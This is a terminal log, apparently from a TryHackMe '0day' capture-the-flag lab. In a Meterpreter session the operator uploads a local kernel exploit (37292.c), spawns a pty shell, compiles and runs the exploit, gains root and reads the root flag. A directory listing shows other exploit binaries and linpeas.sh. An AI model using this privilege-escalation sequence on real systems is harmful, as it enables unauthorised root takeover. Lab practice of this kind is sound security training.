> sysinfo Computer : 10.10.249.163 OS : Ubuntu 14.04 (Linux 3.13.0-32-generic) Architecture : x64 BuildTuple : i486-linux-musl Meterpreter : x86/linux meterpreter > ls Listing: /usr/lib/cgi-bin ========================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100755/rwxr-xr-x 73 fil 2020-09-02 13:17:29 -0400 test.cgi meterpreter > cd /tmp meterpreter > ls Listing: /tmp ============= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 041777/rwxrwxrwx 4096 dir 2023-01-07 22:10:56 -0500 .ICE-unix 041777/rwxrwxrwx 4096 dir 2023-01-07 22:10:56 -0500 .X11-unix 100755/rwxr-xr-x 13652 fil 2023-01-07 23:18:26 -0500 0day 100644/rw-r--r-- 4968 fil 2023-01-07 23:16:00 -0500 37292.c 100777/rwxrwxrwx 207 fil 2023-01-07 23:36:32 -0500 Mngiw 100755/rwxr-xr-x 17480 fil 2023-01-07 23:07:20 -0500 cowroot 100644/rw-r--r-- 4688 fil 2023-01-07 22:57:54 -0500 cowroot.c 100755/rwxr-xr-x 16872 fil 2023-01-07 23:09:51 -0500 exploit1 100755/rwxr-xr-x 17464 fil 2023-01-07 23:10:42 -0500 exploit2 100755/rwxr-xr-x 777018 fil 2023-01-07 22:42:18 -0500 linpeas.sh 100755/rwxr-xr-x 16936 fil 2023-01-07 23:16:23 -0500 overlayfs meterpreter > upload 37292.c [*] Uploading : /home/kali/0day_ctf/37292.c -> 37292.c [*] Uploaded -1.00 B of 4.85 KiB (-0.02%): /home/kali/0day_ctf/37292.c -> 37292.c [*] Completed : /home/kali/0day_ctf/37292.c -> 37292.c meterpreter > shell Process 16408 created. Channel 2 created. python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@ubuntu:/tmp$ gcc 37292.c -o witty gcc 37292.c -o witty www-data@ubuntu:/tmp$ chmod +x witty chmod +x witty www-data@ubuntu:/tmp$ ./witty ./witty spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # cat /root/root.txt cat /root/root.txt THM{g00d_j0b_0day_is_Pleased} :)